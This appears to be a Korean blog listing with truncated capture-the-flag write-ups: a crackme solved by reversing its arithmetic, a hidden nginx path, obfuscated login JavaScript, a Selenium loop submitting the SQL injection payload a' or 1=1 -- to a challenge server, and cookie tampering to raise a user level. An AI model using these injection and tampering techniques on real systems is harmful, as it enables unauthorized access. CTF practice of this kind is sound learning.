히공

Rev Baby Crack 문제 메인 함수는 헥스레이가 작동되지 않도록 함수 프롤로그를 빼버렸다. 어려운 코드도 아니고 해서 그냥 어셈으로 분석했다. 키 값이 khngEe 일 때 name 값을 알아내야 하므로 보이는 루틴에서 보이는 연산을 분석해 역연산 루틴을 만들었다. chr(ord('k')-3) + chr(ord('h')-7) + chr(ord('n')-0xb) + chr(ord('g')+4) + chr(ord('E')+0x20) + chr(ord('e')-1) FLAG : HCAMP{hacked} CompReverse 문제 __int64 __fastcall sub_100003D70(const char *buf) { __int64 result; // rax int j; // [rsp+8h] [rbp-..

문제 이런 페이지가 나온다. 저 value를 1로 바꿔보았다. Login 버튼 클릭 이런 영어가 뜬다. /maybehereimportantstuff 이 곳을 들어가봤다. 플래그 : flag{ng1nx_m1sconf1g_c4n_b3_h4rmful}

문제 사이트 form태그를 보니깐 cuser, cpass로 id, 비번을 주는 걸 볼 수 있다. $(document).ready(function(){ $("form").submit(function(){ var usr = $("#cuser").val(); var pswd = $("#cpass").val(); var magic = ""; var _0x3150=["","\x6C\x65\x6E\x67\x74\x68","\x6D\x61\x78","\x63\x68\x61\x72\x41\x74","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x73\x68\x61\x6B\x74\x69"];fun..

문제 이런 사이트다. sql injection으로 count를 올릴 수 있다. from selenium import webdriver url = "http://34.121.84.161:8084/" driver = webdriver.Chrome('chromedriver.exe') driver.get(url=url) driver.implicitly_wait(5) for i in range(500): driver.find_element_by_xpath('//*[@id="guess"]').send_keys("a' or 1=1 --") driver.find_element_by_xpath('/html/body/section/form/input[2]').click() input() 셀레니움으로 빨리 풀 수 있었다. ..

chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?utm_source=chrome-ntp-icon EditThisCookie EditThisCookie는 쿠키 관리자입니다. 이것을 이용하여 쿠키를 추가하고, 삭제하고, 편집하고, 찾고, 보호하거나 막을 수 있습니다! chrome.google.com 이 앱을 다운받아주세요. 이러한 화면이 뜹니다. 소스코드 입니다. 밑에 php소스코드를 보면 COOKIE 중 user_lv가 존재해야하고, 6 이하, 5 초과 여야 한다고 합니다. 저는 숫자 5를 좋아하니 5.5를 넣어보겠습니다. 1로 설정되어있는 user_lv를 5.5로 바꾸었습니다. 그리고 새로고침을 해주면 짜잔..